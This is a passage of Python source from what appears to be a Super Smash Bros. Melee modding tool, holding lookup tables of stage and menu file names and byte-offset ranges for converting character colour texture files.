'TCa.gat': 'Silph Co. (Saffron City)', # 20XXHP 5.0+
'TCl.bat': 'Smash 4 Battlefield',
'TCl.gat': 'Brawl Battlefield - Dusk', # 20XXHP 5.0+
'TCl.sat': 'Suzaku Castle',
'TDk.0at': 'Meta Mine', # 20XXHP 5.0+
'TDr.0at': 'Training Room', # 20XXHP 5.0+
'TFe.kat': 'Kalos Pokémon League',
'TFx.0at': 'The Plain', # 20XXHP 5.0+
'TGn.0at': '75m', # 20XXHP 5.0+
'TKb.gat': 'Miiverse (variation 1)',
'TKb.hat': 'Miiverse (variation 2)',
'TKb.iat': 'Miiverse (variation 3)',
'TKb.jat': 'Miiverse (variation 4)',
'TKp.mat': 'Metroid Lab',
'TLg.1at': 'Giant GameCube',
'TLg.mat': 'Metal Cavern M',
'TLk.0at': 'Lylat Cruise', # 20XXHP 5.0+
'TMs.0at': 'Toy Time', # 20XXHP 5.0+
'TNs.0at': 'Throne Room (Wario Land)', # 20XXHP 5.0+
'TPe.hat': 'Hyrule Castle (N64)',
'TSk.0at': 'Meta Crystal', # 20XXHP 5.0+
#'TSk.1at': 'The North Palace', # 20XXHP 5.0+
'Yt.1at': "Yoshi's Island, Hacked",
'Yt.2at': "Milun's Island - Form A", # 20XXHP 5.0+
'Yt.3at': "Milun's Island - Form B", # 20XXHP 5.0+
'Yt.4at': "Milun's Island - Form C" # 20XXHP 5.0+
}
miscNameLookup = {
'GmGover': '1P Mode: Game Over Screen',
'GmPause': 'Pause Screen',
'GmRst': 'Results Screen',
'GmStRoll': 'Credits Screen/Minigame',
'GmTitle': 'Title Screen',
'GmTou1p': 'Tournament Mode, File 1',
'GmTou2p': 'Tournament Mode, File 2',
'GmTou3p': 'Tournament Mode, File 3',
'GmTou4p': 'Tournament Mode, File 4',
'GmTrain': 'Training Mode',
'GmTtAll': 'Title Screen',
'IfComS0': 'Dual 1v1 Infographic',
'IfComS1': 'Chess Melee Infographic',
'IfComS2': 'Dodgeball Infographic',
'IfComS3': 'NBA Jam Infographic',
'IfComS4': 'SD Remix Infographic',
'IfComS5': 'SSBM Teir List',
'IfHrNoCn': 'Home Run Contest, File 1',
'IfHrReco': 'Home Run Contest, File 2',
'IfPrize': 'Special Achievement Messages',
'IfVsCam': 'Special Melee: Camera Mode',
'IrAls': '1P Mode: "VS." Intro Screens',
'ItCo': 'Items',
'LbMcGame': 'Memory card banners and icon',
'LbMcSnap': 'Memory card snapshot banner/icon',
'MnExtAll': 'Extra menu graphics for the CSS',
'MnMaAll': 'Main menu graphics file',
'MnSlChr': 'Character Select Screen',
'MnSlMap': 'Stage Select Screen',
'NtAppro': "'New Challenger' Screens",
'opening': 'Game banner, title, and description texts',
'PlCo': 'Textures common to the cast',
'SdMenu': 'Special menu characters'
}
# The following offsets are for the Character Color Converter. They are file offsets (meaning they include the 0x20 file header size).
# These represent comparable blocks of data. Blocks that should represent the same textures across differing character files.
# The ranges exclude the palette data pointers, but not the rest of the palette headers.
CCC = {
'dataStorage': {'sourceFile': '', 'destFile': ''}, # Will also be filled with other data by prepareColorConversion().
'Captain': { 'fullName': 'Captain Falcon', 'universe': 'F-Zero',
'Bu': ( (0x21040, 0x7ec40), ), # All type _14
'Gr': ( (0x21020, 0x7ec20), ),
'Gy': ( (0x21000, 0x7ec00), ),
'Nr': ( (0x21060, 0x7ec60), ),
'Re': ( (0x21040, 0x7ec40), ),
#'Re': ( (0x21040, 0x7ec40), ), # Hell Hawk texture at (0x7ec40, 0x86c40); no equivalent in other files.
'Wh': ( (0x21120, 0x7ed20), )
},
'Clink': { 'fullName': 'Young Link', 'universe': 'The Legend of Zelda',
'Bk': ( (0x1f040, 0x29940), (0x29940, 0x2db40), (0x2db44, 0x31d60), (0x31d64, 0x42c00), # Body / equipment
(0x43760, 0x57760), (0x58200, 0x6c200), # Eyes - image data
(0x57760, 0x57960), (0x57964, 0x57b80), (0x57b84, 0x57da0), (0x57da4, 0x57fc0), (0x57fc4, 0x581e0), (0x581e4, 0x58200), # Eyes - palettes & palette headers
(0x6c200, 0x6c400), (0x6c404, 0x6c620), (0x6c624, 0x6c840), (0x6c844, 0x6ca60), (0x6ca64, 0x6cc80), (0x6cc84, 0x6cca0) ), # Eyes - palettes & palette headers
'Bu': ( (0x1f040, 0x29940), (0x29940, 0x2db40), (0x2db44, 0x31d60), (0x31d64, 0x42c00),
(0x43760, 0x57760), (0x58200, 0x6c200),
(0x57760, 0x57960), (0x57964, 0x57b80), (0x57b84, 0x57da0), (0x57da4, 0x57fc0), (0x57fc4, 0x581e0), (0x581e4, 0x58200),
(0x6c200, 0x6c400), (0x6c404, 0x6c620), (0x6c624, 0x6c840), (0x6c844, 0x6ca60), (0x6ca64, 0x6cc80), (0x6cc84, 0x6cca0) ),
'Nr': ( (0x1f040, 0x29940), (0x29940, 0x2db40), (0x2db44, 0x31d60), (0x31d64, 0x42c00),
(0x43760, 0x57760), (0x58200, 0x6c200),
(0x57760, 0x57960), (0x57964, 0x57b80), (0x57b84, 0x57da0), (0x57da4, 0x57fc0), (0x57fc4, 0x581e0), (0x581e4, 0x58200),
(0x6c200, 0x6c400), (0x6c404, 0x6c620), (0x6c624, 0x6c840), (0x6c844, 0x6ca60), (0x6ca64, 0x6cc80), (0x6cc84, 0x6cca0) ),
'Re': ( (0x1f040, 0x29940), (0x29940, 0x2db40), (0x2db44, 0x31d60), (0x31d64, 0x42c00),
(0x43760, 0x57760), (0x58200, 0x6c200),
(0x57760, 0x57960), (0x57964, 0x57b80), (0x57b84, 0x57da0), (0x57da4, 0x57fc0), (0x57fc4, 0x581e0), (0x581e4, 0x58200),
(0x6c200, 0x6c400), (0x6c404, 0x6c620), (0x6c624, 0x6c840), (0x6c844, 0x6ca60), (0x6ca64, 0x6cc80), (0x6cc84, 0x6cca0) ),
'Wh': ( (0x1f040, 0x29940), (0x29940, 0x2db40), (0x2db44, 0x31d60), (0x31d64, 0x42c00),
(0x43760, 0x57760), (0x58200, 0x6c200),
(0x57760, 0x57960), (0x57964, 0x57b80), (0x57b84, 0x57da0), (0x57da4, 0x57fc0), (0x57fc4, 0x581e0), (0x581e4, 0x58200),
(0x6c200, 0x6c400), (0x6c404, 0x6c620), (0x6c624, 0x6c840), (0x6c844, 0x6ca60), (0x6ca64, 0x6cc80), (0x6cc84, 0x6cca0) )
},
'Donkey': { 'fullName': 'Donkey Kong', 'universe': 'Donkey Kong',
'Bk': ( (0x1d6a0, 0x5b8a0), (0x5b8a4, 0x5fac0), (0x5fac4, 0x7e240), (0x7ea80, 0x8ca80), (0x8cb40, 0x8cd40),
(0x8cd44, 0x8cf60), (0x8cf64, 0x9af80), (0x9b040, 0x9b240), (0x9b244, 0x9b460), (0x9b464, 0x9b480) ),
'Bu': ( (0x1d6a0, 0x5b8a0), (0x5b8a4, 0x5fac0), (0x5fac4, 0x7e240), (0x7ea80, 0x8ca80), (0x8cb40, 0x8cd40),
(0x8cd44, 0x8cf60), (0x8cf64, 0x9af80), (0x9b040, 0x9b240), (0x9b244, 0x9b460), (0x9b464, 0x9b480) ),
'Gr': ( (0x1d6a0, 0x5b8a0), (0x5b8a4, 0x5fac0), (0x5fac4, 0x7e240), (0x7ea80, 0x8ca80), (0x8cb40, 0x8cd40),
(0x8cd44, 0x8cf60), (0x8cf64, 0x9af80), (0x9b040, 0x9b240), (0x9b244, 0x9b460), (0x9b464, 0x9b480) ),
'Nr': ( (0x1d6a0, 0x5b8a0), (0x5b8a4, 0x5fac0), (0x5fac4, 0x7e240), (0x7ea80, 0x8ca80), (0x8cb40, 0x8cd40),
(0x8cd44, 0x8cf60), (0x8cf64, 0x9af80), (0x9b040, 0x9b240), (0x9b244, 0x9b460), (0x9b464, 0x9b480) ),
'Re': ( (0x1d6a0, 0x5b8a0), (0x5b8a4, 0x5fac0), (0x5fac4, 0x7e240), (0x7ea80, 0x8ca80), (0x8cb40, 0x8cd40),
(0x8cd44, 0x8cf60), (0x8cf64, 0x9af80), (0x9b040, 0x9b240), (0x9b244, 0x9b460), (0x9b464, 0x9b480) )
},
'Drmario': { 'fullName': 'Dr. Mario', 'universe': 'Mario',
'Bk': ( (0x1b760, 0x32ee0), (0x32ee4, 0x46200), (0x46c20, 0x73c20), (0x73c20, 0x73e20), (0x73e24, 0x74040),
(0x74044, 0x74260), (0x74264, 0x74480), (0x74480, 0x746a0), (0x746a4, 0x746c0) ),
'Bu': ( (0x1b760, 0x32ee0), (0x32ee4, 0x46200), (0x46c20, 0x73c20), (0x73c20, 0x73e20), (0x73e24, 0x74040),
(0x74044, 0x74260), (0x74264, 0x74480), (0x74480, 0x746a0), (0x746a4, 0x746c0) ),
'Gr': ( (0x1b760, 0x32ee0), (0x32ee4, 0x46200), (0x46c20, 0x73c20), (0x73c20, 0x73e20), (0x73e24, 0x74040),
(0x74044, 0x74260), (0x74264, 0x74480), (0x74480, 0x746a0), (0x746a4, 0x746c0) ),
'Nr': ( (0x1b760, 0x32ee0), (0x32ee4, 0x46200), (0x46c20, 0x73c20), (0x73c20, 0x73e20), (0x73e24, 0x74040),
(0x74044, 0x74260), (0x74264, 0x74480), (0x74480, 0x746a0), (0x746a4, 0x746c0) ),
'Re': ( (0x1b760, 0x32ee0), (0x32ee4, 0x46200), (0x46c20, 0x73c20), (0x73c20, 0x73e20), (0x73e24, 0x74040),
(0x74044, 0x74260), (0x74264, 0x74480), (0x74480, 0x746a0), (0x746a4, 0x746c0) )
},
'Falco': { 'fullName': 'Falco', 'universe': 'Star Fox',
'Bu': ( (0x18ae0, 0x358e0), (0x360c0, 0x3a0c0) ),
'Gr': ( (0x18ae0, 0x358e0), (0x360c0, 0x3a0c0) ),
'Nr': ( (0x18ae0, 0x358e0), (0x360c0, 0x3a0c0) ),
'Re': ( (0x18ae0, 0x358e0), (0x360c0, 0x3a0c0) )
},
'Emblem': { 'fullName': 'Roy', 'universe': 'Fire Emblem',
'Bu': ( (0x22300, 0x7be00), (0x7ca40, 0x9f180) ),
'Gr': ( (0x22300, 0x7be00), (0x7ca40, 0x9f180) ),
'Nr': ( (0x22300, 0x7be00), (0x7ca40, 0x9f180) ),
'Re': ( (0x22300, 0x7be00), (0x7ca40, 0x9f180) ),
'Ye': ( (0x22300, 0x7be00), (0x7ca40, 0x9f180) )
},
'Fox': { 'fullName': 'Fox', 'universe': 'Star Fox',
'Gr': ( (0x1e500, 0x52420), (0x52da0, 0x56da0) ),
'La': ( (0x1e500, 0x52420), (0x52da0, 0x56da0) ),
'Nr': ( (0x1e500, 0x52420), (0x52da0, 0x56da0) ),
'Or': ( (0x1e500, 0x52420), (0x52da0, 0x56da0) )
},
'Ganon': { 'fullName': 'Ganondorf', 'universe': 'The Legend of Zelda',
'Bu': ( (0x1fbc0, 0x5d1c0), ),
'Gr': ( (0x1fbc0, 0x5d1c0), ),
'La': ( (0x1fbc0, 0x5d1c0), ),
'Nr': ( (0x1fbc0, 0x5d1c0), ),
'Re': ( (0x1fbc0, 0x5d1c0), )
},
'Kirby': { 'fullName': 'Kirby', 'universe': 'Kirby', # Ignores eye textures
'Bu': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) ),
'Gr': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) ),
'Nr': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) ),
'Re': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) ),
'Wh': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) ),
'Ye': ( (0x1fca0, 0x23ea0), (0x23ea4, 0x25840), (0x25844, 0x31b40) )
},
'Koopa': { 'fullName': 'Bowser', 'universe': 'Mario',
'Bk': ( (0x2a720, 0x61520), (0x61520, 0x626c0), (0x626c4, 0x6de00), (0x6de00, 0x6fe00), (0x70b20, 0x75d20),
(0x75d24, 0x75f00), (0x75f04, 0x76120), (0x76124, 0x76340), (0x76344, 0x76560), (0x76564, 0x76580) ),
'Bu': ( (0x2a720, 0x61520), (0x61520, 0x626c0), (0x626c4, 0x6de00), (0x6de00, 0x6fe00), (0x70b20, 0x75d20),
(0x75d24, 0x75f40), (0x75f44, 0x76160), (0x76164, 0x76380), (0x76384, 0x765a0), (0x765a4, 0x765a0) ),
'Nr': ( (0x2a720, 0x61520), (0x61520, 0x626c0), (0x626c4, 0x6de00), (0x6de00, 0x75e00), (0x76b20, 0x7bd20),
(0x7bd24, 0x7bf40), (0x7bf44, 0x7c160), (0x7c164, 0x7c380), (0x7c384, 0x7c5a0), (0x7c5a4, 0x7c5c0) ),
'Re': ( (0x2a720, 0x61520), (0x61520, 0x62720), (0x62724, 0x6de60), (0x6de60, 0x6fe60), (0x70b80, 0x75d80),
(0x75d84, 0x75ee0), (0x75ee4, 0x760e0), (0x760e4, 0x76300), (0x76304, 0x76520), (0x76524, 0x76540) )
},
'Luigi': { 'fullName': 'Luigi', 'universe': 'Mario',
'Aq': ( (0x1b2c0, 0x2c740), (0x2c740, 0x30f40), (0x30f40, 0x42be0), (0x43400, 0x59c00) ),
'Nr': ( (0x1b2c0, 0x2c740), (0x2c740, 0x30f40), (0x30f40, 0x42be0), (0x43400, 0x59c00) ),
'Pi': ( (0x1b2c0, 0x2c740), (0x2c740, 0x30f40), (0x30f40, 0x42be0), (0x43400, 0x59c00) ),
'Wh': ( (0x1b2c0, 0x2c740), (0x2c740, 0x35960), (0x35960, 0x47600), (0x47ea0, 0x75940) )
},
'Link': { 'fullName': 'Link', 'universe': 'The Legend of Zelda',
'Bk': ( (0x20a60, 0x25560), (0x25564, 0x29780), (0x29784, 0x2ccc0), (0x2ccc4, 0x3aee0), (0x3aee4, 0x3f100),
(0x3f104, 0x4c220), (0x4ce00, 0x61000), (0x61004, 0x61220), (0x61224, 0x61440), (0x61444, 0x61660),
(0x61664, 0x61880), (0x61884, 0x75aa0), (0x75aa4, 0x75cc0), (0x75cc4, 0x75ee0), (0x75ee4, 0x76100),
(0x76104, 0x76320), (0x76324, 0x76340) ),
'Bu': ( (0x20a60, 0x25560), (0x25564, 0x29780), (0x29784, 0x2ccc0), (0x2ccc4, 0x3aee0), (0x3aee4, 0x3f100),
(0x3f104, 0x4c220), (0x4ce00, 0x61000), (0x61004, 0x61220), (0x61224, 0x61440), (0x61444, 0x61660),
(0x61664, 0x61880), (0x61884, 0x75aa0), (0x75aa4, 0x75cc0), (0x75cc4, 0x75ee0), (0x75ee4, 0x76100),
(0x76104, 0x76320), (0x76324, 0x76340) ),
'Nr': ( (0x20a60, 0x25560), (0x25564, 0x29780), (0x29784, 0x2ccc0), (0x2ccc4, 0x3aee0), (0x3aee4, 0x3f100),
(0x3f104, 0x4c220), (0x4ce00, 0x61000), (0x61004, 0x61220), (0x61224, 0x61440), (0x61444, 0x61660),
(0x61664, 0x61880), (0x61884, 0x75aa0), (0x75aa4, 0x75cc0), (0x75cc4, 0x75ee0), (0x75ee4, 0x76100),
(0x76104, 0x76320), (0x76324, 0x76340) ),
'Re': ( (0x20a60, 0x25560), (0x25564, 0x29780), (0x29784, 0x2ccc0), (0x2ccc4, 0x3aee0), (0x3aee4, 0x3f100),
(0x3f104, 0x4c220), (0x4ce00, 0x61000), (0x61004, 0x61220), (0x61224, 0x61440), (0x61444, 0x61660),
(0x61664, 0x61880), (0x61884, 0x75aa0), (0x75aa4, 0x75cc0), (0x75cc4, 0x75ee0), (0x75ee4, 0x76100),
(0x76104, 0x76320), (0x76324, 0x76340) ),
'Wh': ( (0x20a60, 0x25560), (0x25564, 0x29780), (0x29784, 0x2ccc0), (0x2ccc4, 0x3aee0), (0x3aee4, 0x3f100),
(0x3f104, 0x4c220), (0x4ce00, 0x61000), (0x61004, 0x61220), (0x61224, 0x61440), (0x61444, 0x61660),
(0x61664, 0x61880), (0x61884, 0x75aa0), (0x75aa4, 0x75cc0), (0x75cc4, 0x75ee0), (0x75ee4, 0x76100),
(0x76104, 0x76320), (0x76324, 0x76340) )
},
'Mario': { 'fullName': 'Mario', 'universe': 'Mario',
'Bk': ( (0x1ad60, 0x35be0), (0x35be4, 0x43fa0), (0x448a0, 0x71aa0), (0x71aa4, 0x71cc0), (0x71cc4, 0x71ee0),
(0x71ee4, 0x72100), (0x72104, 0x72320), (0x72324, 0x72340) ),
'Bu': ( (0x1ad60, 0x35be0), (0x35be4, 0x43fa0), (0x448a0, 0x71aa0), (0x71aa4, 0x71cc0), (0x71cc4, 0x71ee0),
(0x71ee4, 0x72100), (0x72104, 0x72320), (0x72324, 0x72340) ),
'Gr': ( (0x1ad60, 0x35be0), (0x35be4, 0x43fa0), (0x448a0, 0x71aa0), (0x71aa4, 0x71cc0), (0x71cc4, 0x71ee0),
(0x71ee4, 0x72100), (0x72104, 0x72320), (0x72324, 0x72340) ),
'Nr': ( (0x1ad60, 0x35be0), (0x35be4, 0x43fa0), (0x448a0, 0x71aa0), (0x71aa4, 0x71cc0), (0x71cc4, 0x71ee0),
(0x71ee4, 0x72100), (0x72104, 0x72320), (0x72324, 0x72340) ),
'Ye': ( (0x1ad60, 0x35be0), (0x35be4, 0x43fa0), (0x448a0, 0x71aa0), (0x71aa4, 0x71cc0), (0x71cc4, 0x71ee0),
(0x71ee4, 0x72100), (0x72104, 0x72320), (0x72324, 0x72340) )
},
'Mars': { 'fullName': 'Marth', 'universe': 'Fire Emblem',
'Bk': ( (0x21d80, 0x40080), (0x40084, 0x442a0), (0x442a4, 0x454c0), (0x454c4, 0x4a6e0), (0x4a6e4, 0x4e900),
(0x4e904, 0x65320), (0x65f20, 0x7a120), (0x7a124, 0x7a340), (0x7a344, 0x7a560), (0x7a564, 0x7a780),
(0x7a784, 0x7a9a0), (0x7a9a4, 0x7a9c0), (0x7a9c0, 0x8ebc0), (0x8ebc4, 0x8ede0), (0x8ede4, 0x8f000),
(0x8f004, 0x8f220), (0x8f224, 0x8f440), (0x8f444, 0x8f460) ),
'Gr': ( (0x21d80, 0x40080), (0x40084, 0x442a0), (0x442a4, 0x454c0), (0x454c4, 0x4a6e0), (0x4a6e4, 0x4e900),
(0x4e904, 0x65320), (0x65f20, 0x7a120), (0x7a124, 0x7a340), (0x7a344, 0x7a560), (0x7a564, 0x7a780),
(0x7a784, 0x7a9a0), (0x7a9a4, 0x7a9c0), (0x7a9c0, 0x8ebc0), (0x8ebc4, 0x8ede0), (0x8ede4, 0x8f000),
(0x8f004, 0x8f220), (0x8f224, 0x8f440), (0x8f444, 0x8f460) ),
'Nr': ( (0x21d80, 0x40080), (0x40084, 0x442a0), (0x442a4, 0x454c0), (0x454c4, 0x4a6e0), (0x4a6e4, 0x4e900),
(0x4e904, 0x65320), (0x65f20, 0x7a120), (0x7a124, 0x7a340), (0x7a344, 0x7a560), (0x7a564, 0x7a780),
(0x7a784, 0x7a9a0), (0x7a9a4, 0x7a9c0), (0x7a9c0, 0x8ebc0), (0x8ebc4, 0x8ede0), (0x8ede4, 0x8f000),
(0x8f004, 0x8f220), (0x8f224, 0x8f440), (0x8f444, 0x8f460) ),
'Re': ( (0x21d80, 0x40080), (0x40084, 0x442a0), (0x442a4, 0x454c0), (0x454c4, 0x4a6e0), (0x4a6e4, 0x4e900),
(0x4e904, 0x65320), (0x65f20, 0x7a120), (0x7a124, 0x7a340), (0x7a344, 0x7a560), (0x7a564, 0x7a780),
(0x7a784, 0x7a9a0), (0x7a9a4, 0x7a9c0), (0x7a9c0, 0x8ebc0), (0x8ebc4, 0x8ede0), (0x8ede4, 0x8f000),
(0x8f004, 0x8f220), (0x8f224, 0x8f440), (0x8f444, 0x8f460) ),
'Wh': ( (0x21d80, 0x40080), (0x40084, 0x442a0), (0x442a4, 0x454c0), (0x454c4, 0x4a6e0), (0x4a6e4, 0x4e900),
(0x4e904, 0x65320), (0x65f20, 0x7a120), (0x7a124, 0x7a340), (0x7a344, 0x7a560), (0x7a564, 0x7a780),
(0x7a784, 0x7a9a0), (0x7a9a4, 0x7a9c0), (0x7a9c0, 0x8ebc0), (0x8ebc4, 0x8ede0), (0x8ede4, 0x8f000),
(0x8f004, 0x8f220), (0x8f224, 0x8f440), (0x8f444, 0x8f460) )
},
'Mewtwo': { 'fullName': 'Mewtwo', 'universe': 'Pokemon',
'Bu': ( (0x19540, 0x2eb40), (0x2f440, 0x3d440) ),
'Gr': ( (0x19540, 0x2eb40), (0x2f440, 0x3d440) ),
'Nr': ( (0x19540, 0x2eb40), (0x31440, 0x3f440) ), # Also contains an additional eye texture, at (0x2f440, 0x31440), not present in the other color files.
'Re': ( (0x19540, 0x2eb40), (0x2f440, 0x3d440) )
},
'Nana': { 'fullName': 'Nana (Ice Climbers)', 'universe': 'Ice Climber',
'Aq': ( (0x107c0, 0x3c4c0), (0x3cb40, 0x54b40) ),
'Nr': ( (0x10800, 0x3c500), (0x3cb80, 0x54b80) ),
'Wh': ( (0x107c0, 0x3c4c0), (0x3cb40, 0x54b40) ),
'Ye': ( (0x107e0, 0x3c4e0), (0x3cb60, 0x54b60) )
},
'Ness': { 'fullName': 'Ness', 'universe': 'EarthBound',
'Bu': ( (0x1d220, 0x51a20), (0x52300, 0x5a300) ),
'Gr': ( (0x1d220, 0x51a20), (0x52300, 0x5a300) ),
'Nr': ( (0x1cae0, 0x512e0), (0x51b80, 0x59b80) ),
'Ye': ( (0x1d200, 0x51a00), (0x522e0, 0x5a2e0) ),
},
'Pichu': { 'fullName': 'Pichu', 'universe': 'Pokemon',
'Bu': ( (0x1e800, 0x1f020), (0x1f020, 0x28820), (0x28c20, 0x2ac20), (0x2b320, 0x37320) ),
'Gr': ( (0x16b00, 0x17320), (0x2c320, 0x35b20), (0x3db20, 0x3fb20), (0x40240, 0x4c240) ),
'Nr': ( (0x101c0, 0x109e0), (0x109e0, 0x1a1e0), (0x1a1e0, 0x1c1e0), (0x1c7e0, 0x287e0) ),
'Re': ( (0x151e0, 0x15a00), (0x15a00, 0x1f200), (0x1f200, 0x21200), (0x25840, 0x31840) )
},
'Peach': { 'fullName': 'Peach', 'universe': 'Mario',
'Bu': ( (0x221c0, 0x263c0), (0x263c4, 0x294e0), (0x294e0, 0x29ac0), (0x29ac4, 0x2a080), (0x2a084, 0x2a0a0),
(0x2a0a0, 0x2b8c0), (0x2b8c0, 0x2ce20), (0x2ce24, 0x2de40), (0x2de40, 0x2e7c0), (0x2e7c4, 0x329e0),
(0x329e4, 0x3ec00), (0x3ec04, 0x42e20), (0x42e24, 0x4c740), (0x4c740, 0x4ec40), (0x4ec44, 0x55860),
(0x55864, 0x5d380), (0x5d384, 0x680a0), (0x680a4, 0x6a4c0), (0x6b160, 0xc3160) ),
'Gr': ( (0x221c0, 0x263c0), (0x263c4, 0x294e0), (0x294e0, 0x29ac0), (0x29ac4, 0x2a080), (0x2a084, 0x2a0a0),
(0x2a0a0, 0x2b8c0), (0x2b8c0, 0x2ce20), (0x2ce24, 0x2de40), (0x2de40, 0x2e720), (0x2e724, 0x32940),
(0x32944, 0x3eb60), (0x3eb64, 0x42d80), (0x42d84, 0x4c6a0), (0x4c6a0, 0x4ebc0), (0x4ec44, 0x557e0),
(0x557e4, 0x5d300), (0x5d304, 0x68020), (0x68024, 0x6a440), (0x6b0e0, 0xc30e0) ),
'Nr': ( (0x221c0, 0x263c0), (0x263c4, 0x294e0), (0x294e0, 0x29ae0), (0x29ae4, 0x2a100), (0x2a104, 0x2a120),
(0x2a120, 0x2b940), (0x2b940, 0x2d780), (0x2d784, 0x2e7a0), (0x2e7a0, 0x2f1a0), (0x2f1a4, 0x333c0),
(0x333c4, 0x3f5e0), (0x3f5e4, 0x43800), (0x43804, 0x4d120), (0x4d120, 0x4f720), (0x4f724, 0x56340),
(0x56344, 0x5de60), (0x5de64, 0x68b80), (0x68b84, 0x6afa0), (0x6bc40, 0xc3c40) ),
'Wh': ( (0x221c0, 0x263c0), (0x263c4, 0x294e0), (0x294e0, 0x29a00), (0x29a04, 0x29fc0), (0x29fc4, 0x29fe0),
(0x29fe0, 0x2b800), (0x2b800, 0x2ce00), (0x2ce04, 0x2de20), (0x2de20, 0x2e700), (0x2e704, 0x32920),
(0x32924, 0x3eb40), (0x3eb44, 0x42d60), (0x42d64, 0x4eb80), (0x4eb80, 0x4eb80), (0x4eb84, 0x557a0),
(0x557a4, 0x5d2c0), (0x5d2c4, 0x67fe0), (0x67fe4, 0x6a400), (0x6b0a0, 0xc30a0) )
#'Ye': ( ) Too many changes from above to track. Will need to be manually converted.
},
'Pikachu': { 'fullName': 'Pikachu', 'universe': 'Pokemon',
'Bu': ( (0x15840, 0x15860), (0x19860, 0x1d360), (0x1d9c0, 0x256c0) ),
'Gr': ( (0x15f40, 0x15f60), (0x19f60, 0x1da60), (0x1e0c0, 0x25dc0) ),
'Nr': ( (0x14160, 0x14180), (0x14180, 0x17c80), (0x182a0, 0x1ffa0) ),
'Re': ( (0x15280, 0x152a0), (0x1baa0, 0x1f5a0), (0x1fc20, 0x27920) )
},
'Popo': { 'fullName': 'Popo (Ice Climbers)', 'universe': 'Ice Climber',
'Gr': ( (0x10780, 0x3c480), (0x3cb00, 0x54b00) ),
'Nr': ( (0x10780, 0x3c480), (0x3cb00, 0x54b00) ),
'Or': ( (0x10780, 0x3c480), (0x3cb00, 0x54b00) ),
'Re': ( (0x107e0, 0x3c4e0), (0x3cb60, 0x54b60) )
},
'Purin': { 'fullName': 'Jigglypuff', 'universe': 'Pokemon',
'Bu': ( (0x11b80, 0x13ba0), (0x13ba0, 0x17ce0), (0x17ce4, 0x19900),
(0x19ea0, 0x2dfe0), (0x2dfe4, 0x2e120), (0x2e124, 0x2e2a0), (0x2e2a4, 0x2e400), (0x2e404, 0x2e560),
(0x2e564, 0x3a6c0), (0x3a6c4, 0x3a800), (0x3a804, 0x3a980), (0x3a984, 0x3a9a0) ),
'Gr': ( (0x11b80, 0x13ba0), (0x13ba0, 0x17ce0), (0x17ce4, 0x19900),
(0x19ea0, 0x2dfe0), (0x2dfe4, 0x2e120), (0x2e124, 0x2e2a0), (0x2e2a4, 0x2e400), (0x2e404, 0x2e560),
(0x2e564, 0x3a6c0), (0x3a6c4, 0x3a800), (0x3a804, 0x3a980), (0x3a984, 0x3a9a0) ),
'Nr': ( (0x11b80, 0x13ba0), (0x13ba0, 0x17da0), (0x17dc0, 0x199c0),
(0x19f60, 0x2e160), (0x2e164, 0x2e380), (0x2e384, 0x2e5a0), (0x2e5a4, 0x2e7c0), (0x2e7c4, 0x2e9e0),
(0x2e9e4, 0x3ac00), (0x3ac04, 0x3ae20), (0x3ae24, 0x3b040), (0x3b044, 0x3b060) ),
'Re': ( (0x11b80, 0x13ba0), (0x13ba0, 0x17ce0), (0x17ce4, 0x19900),
(0x19ea0, 0x2dfe0), (0x2dfe4, 0x2e120), (0x2e124, 0x2e2a0), (0x2e2a4, 0x2e400), (0x2e404, 0x2e560),
(0x2e564, 0x3a6c0), (0x3a6c4, 0x3a800), (0x3a804, 0x3a980), (0x3a984, 0x3a9a0) ),
'Ye': ( (0x11b80, 0x13ba0), (0x13ba0, 0x17ce0), (0x17ce4, 0x19900),
(0x19ea0, 0x2dfe0), (0x2dfe4, 0x2e120), (0x2e124, 0x2e2a0), (0x2e2a4, 0x2e400), (0x2e404, 0x2e560),
(0x2e564, 0x3a6c0), (0x3a6c4, 0x3a800), (0x3a804, 0x3a980), (0x3a984, 0x3a9a0) )
},
'Seak': { 'fullName': 'Sheik', 'universe': 'The Legend of Zelda',
'Bu': ( (0x1c5e0, 0x2c700), (0x2c700, 0x34900), (0x34904, 0x38b20), (0x38b24, 0x3cd40), (0x3cd44, 0x43100),
(0x43a20, 0x4f020), (0x4f024, 0x4f240), (0x4f244, 0x4f460), (0x4f464, 0x4f680), (0x4f684, 0x4f8a0),
(0x4f8a4, 0x5aec0), (0x5aec4, 0x5b0e0), (0x5b0e4, 0x5b300), (0x5b304, 0x5b520), (0x5b524, 0x5b740), (0x5b744, 0x5b760) ),
'Gr': ( (0x1c5e0, 0x2c700), (0x2c700, 0x348a0), (0x348a4, 0x38ac0), (0x38ac4, 0x3cce0), (0x3cce4, 0x430a0),
(0x439c0, 0x4efc0), (0x4efc4, 0x4f1e0), (0x4f1e4, 0x4f400), (0x4f404, 0x4f620), (0x4f624, 0x4f840),
(0x4f844, 0x5ae60), (0x5ae64, 0x5b080), (0x5b084, 0x5b2a0), (0x5b2a4, 0x5b4c0), (0x5b4c4, 0x5b6e0), (0x5b6e4, 0x5b700) ),
'Nr': ( (0x1c5e0, 0x2c700), (0x2c700, 0x34900), (0x34904, 0x38b20), (0x38b24, 0x3cd40), (0x3cd44, 0x43100),
(0x43a20, 0x4f020), (0x4f024, 0x4f240), (0x4f244, 0x4f460), (0x4f464, 0x4f680), (0x4f684, 0x4f8a0),
(0x4f8a4, 0x5aec0), (0x5aec4, 0x5b0e0), (0x5b0e4, 0x5b300), (0x5b304, 0x5b520), (0x5b524, 0x5b740), (0x5b744, 0x5b760) ),
'Re': ( (0x1c5e0, 0x2c700), (0x2c700, 0x34860), (0x34864, 0x38a80), (0x38a84, 0x3cca0), (0x3cca4, 0x43060),
(0x43980, 0x4ef80), (0x4ef84, 0x4f1a0), (0x4f1a4, 0x4f3c0), (0x4f3c4, 0x4f5e0), (0x4f5e4, 0x4f800),
(0x4f804, 0x4ae20), (0x4ae24, 0x5b040), (0x5b044, 0x5b260), (0x5b264, 0x5b480), (0x5b484, 0x5b6a0), (0x5b6a4, 0x5b6c0) ),
'Wh': ( (0x1c5e0, 0x2c700), (0x2c700, 0x34900), (0x34904, 0x38b20), (0x38b24, 0x3cd40), (0x3cd44, 0x43100),
